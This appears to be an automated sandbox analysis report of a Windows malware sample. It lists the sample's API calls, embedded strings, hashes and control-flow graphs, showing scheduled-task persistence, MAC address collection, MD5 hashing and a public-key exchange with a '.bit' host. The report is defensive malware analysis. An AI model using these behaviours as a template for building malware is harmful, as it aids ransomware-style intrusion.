                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEB5B
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEB7C
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAEB86
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAEB94
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00BAEBAE
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEBB6
                                                                                                                                                                        • _strstr.LIBCMT ref: 00BAEBDA
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEC00
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEC24
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEC32
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEC3E
                                                                                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00BAEC51
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC6D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAEC7F
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAEC93
                                                                                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00BAECB3
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED2A
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00BAED4B
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BAED55
                                                                                                                                                                        • _memset.LIBCMT ref: 00BAED63
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00BAED7D
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAED85
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDA3
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BAEDAE
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00BAEDD3
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00BAEDF7
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00BAEE05
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE15
                                                                                                                                                                        • _free.LIBCMT ref: 00BAEE22
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEF61
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BAEFBF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9D26C
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00B9D28F
                                                                                                                                                                        • CoCreateInstance.OLE32(00C6506C,00000000,00000001,00C64FEC,?,?,00000000,000000FF), ref: 00B9D2D5
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D2F0
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D309
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D322
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9D33B
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D397
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3A4
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3B1
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9D3C2
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9D3D5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
• Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                                        • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                                        • API String ID: 2496729271-1738591096
                                                                                                                                                                        • Opcode ID: c315dfdbe9038feb8bb9cb5b435323a0c554c2ae0d6a2ba6b98589a2a357c50a
                                                                                                                                                                        • Instruction ID: 6dd41c0cf9d3b8cf1ffb7fbfc81cbe624eee9482d058eb1825666ed336dae431
                                                                                                                                                                        • Opcode Fuzzy Hash: c315dfdbe9038feb8bb9cb5b435323a0c554c2ae0d6a2ba6b98589a2a357c50a
                                                                                                                                                                        • Instruction Fuzzy Hash: 71525D70E00219DFDF10DBA5C898FAEBBF5AF49704F1481A8E505BB251DB70AE45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00BA1010
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1026
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00BA103B
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA1051
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00BA1059
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00BA1064
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA107A
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00BA1099
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10AB
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA10CA
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00BA10DE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BA10F0
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BA1100
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA110B
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00BA112E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00BA113C
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00BA1154
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00BA115F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
• Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                        • Opcode ID: a1509e6bcd1b032c2131e365d05718a9265c5163f398cabb691adb1cc89ed09f
                                                                                                                                                                        • Instruction ID: 5e55dc9d5364a0eff125a86d7b613ef1136a542d7573d289c6d3afac98b65ac2
                                                                                                                                                                        • Opcode Fuzzy Hash: a1509e6bcd1b032c2131e365d05718a9265c5163f398cabb691adb1cc89ed09f
                                                                                                                                                                        • Instruction Fuzzy Hash: 89516C71D40319ABDF10EBA4DC86FEFBBB8EB04745F100465FA01B6280E7755A058BA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1ACA
                                                                                                                                                                          • Part of subcall function 00BA1AB0: DispatchMessageW.USER32(?), ref: 00BA1AE0
                                                                                                                                                                          • Part of subcall function 00BA1AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA1AEE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF,?,00000000), ref: 00B9F900
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9F9EA
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00B9FA51
                                                                                                                                                                        • _memmove.LIBCMT ref: 00B9FADA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
• Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                        • Opcode ID: cd770310439b39e76a1f2b563e5198b58f2e8aa5698a49d06caba21ecd1d4c07
                                                                                                                                                                        • Instruction ID: b8718663ead94f1fe94cde574d1c5c9222d9a343e9e679915682f07c6d0773fb
                                                                                                                                                                        • Opcode Fuzzy Hash: cd770310439b39e76a1f2b563e5198b58f2e8aa5698a49d06caba21ecd1d4c07
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F527D71D00209DBDF20DFA8C885BEEB7F5EF15314F2081B9E419A7251E775AA48CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000), ref: 00B9E8CE
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E8E4
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9E8F9
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E90F
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00B9E928
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E93E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9E95D
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E96F
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9E98E
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9E9A2
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9E9B4
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E9D3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                        • Opcode ID: 89115d823623f8ae5a431446dd9ef84d190e07937e442de5a1cb6a868f33fd93
                                                                                                                                                                        • Instruction ID: e12b4a683aeedfc4ec2e2f72e039dad23af2cc22368a4968f6c5852d6a3d2e11
                                                                                                                                                                        • Opcode Fuzzy Hash: 89115d823623f8ae5a431446dd9ef84d190e07937e442de5a1cb6a868f33fd93
                                                                                                                                                                        • Instruction Fuzzy Hash: 55515D71D40209EBEF11EFA4CC46FFEBBB8EB14705F104569F911B6181D7B5AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 1926 b9eaa0-b9eb09 call ba56d0 CryptAcquireContextW 1929 b9eb0b-b9eb17 call bc0eca 1926->1929 1930 b9eb1c-b9eb34 CryptCreateHash 1926->1930 1929->1930 1932 b9eb47-b9eb56 CryptHashData 1930->1932 1933 b9eb36-b9eb42 call bc0eca 1930->1933 1935 b9eb69-b9eb87 CryptGetHashParam 1932->1935 1936 b9eb58-b9eb64 call bc0eca 1932->1936 1933->1932 1938 b9eb89-b9eb95 call bc0eca 1935->1938 1939 b9eb9a-b9ebcc call bb0be4 call bbb420 CryptGetHashParam 1935->1939 1936->1935 1938->1939 1945 b9ebdf 1939->1945 1946 b9ebce-b9ebda call bc0eca 1939->1946 1948 b9ebe1-b9ebe4 1945->1948 1946->1945 1949 b9ec38-b9ec67 call bb2110 CryptDestroyHash CryptReleaseContext 1948->1949 1950 b9ebe6-b9ec00 call bb04a6 1948->1950 1955 b9ec13-b9ec19 1950->1955 1956 b9ec02-b9ec11 call ba3ea0 1950->1956 1957 b9ec20-b9ec25 1955->1957 1956->1948 1957->1957 1959 b9ec27-b9ec36 call ba3ea0 1957->1959 1959->1948
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00C8FCA4,00000000,00000000,00000000,?), ref: 00B9EB01
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB17
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00B9EB2C
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB42
                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00B9EB4E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB64
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00B9EB83
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EB95
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9EBB4
                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00B9EBC8
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B9EBDA
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9EBF4
                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00B9EC44
                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00B9EC4F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                        • Opcode ID: 5ba48d07e21e074e133e0982994ffdd0471661fcb796da43063e36c884a77eae
                                                                                                                                                                        • Instruction ID: ac2bf976666d0c891a1f42276aea93649bba61f3f60f1414cc972cf31bb9f377
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ba48d07e21e074e133e0982994ffdd0471661fcb796da43063e36c884a77eae
                                                                                                                                                                        • Instruction Fuzzy Hash: CC515071E40309ABDF11DBA4CC86FEEBBB8EB44745F100469F901B7181E775AA058BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 1963 b9e670-b9e697 call bb0c62 * 2 1968 b9e699-b9e6b3 call bb1f2d call bb0bed 1963->1968 1969 b9e6b4-b9e6c2 GetAdaptersInfo 1963->1969 1971 b9e6db-b9e6e8 GetAdaptersInfo 1969->1971 1972 b9e6c4-b9e6d9 call bb0bed call bb0c62 1969->1972 1973 b9e6ea-b9e73c call bb04a6 call bb1f2d * 2 1971->1973 1974 b9e744-b9e754 call bb0bed 1971->1974 1972->1968 1972->1971 1989 b9e741 1973->1989 1989->1974
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E67F
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E68B
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E69E
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6A4
                                                                                                                                                                          • Part of subcall function 00BB0BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C13
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6B9
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E6C5
                                                                                                                                                                        • _malloc.LIBCMT ref: 00B9E6CD
                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00B9E6E0
                                                                                                                                                                        • _sprintf.LIBCMT ref: 00B9E720
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E732
                                                                                                                                                                        • _wprintf.LIBCMT ref: 00B9E73C
                                                                                                                                                                        • _free.LIBCMT ref: 00B9E745
                                                                                                                                                                        Strings
                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00B9E71A
                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 00B9E72D
                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00B9E699
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                        • Opcode ID: 76981096679b96be24c5a9fef9f95a7c07a52d6c94cf3de8fa495bb11b382e37
                                                                                                                                                                        • Instruction ID: fe354fcf72fe29bea5f86798f64e6156d9adcafe278811a170164074c585c8a1
                                                                                                                                                                        • Opcode Fuzzy Hash: 76981096679b96be24c5a9fef9f95a7c07a52d6c94cf3de8fa495bb11b382e37
                                                                                                                                                                        • Instruction Fuzzy Hash: D111E7B25146547FC671B2B45C12FFF7ADCCB46712F0405E5FA9CD2141E6989A0493B1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

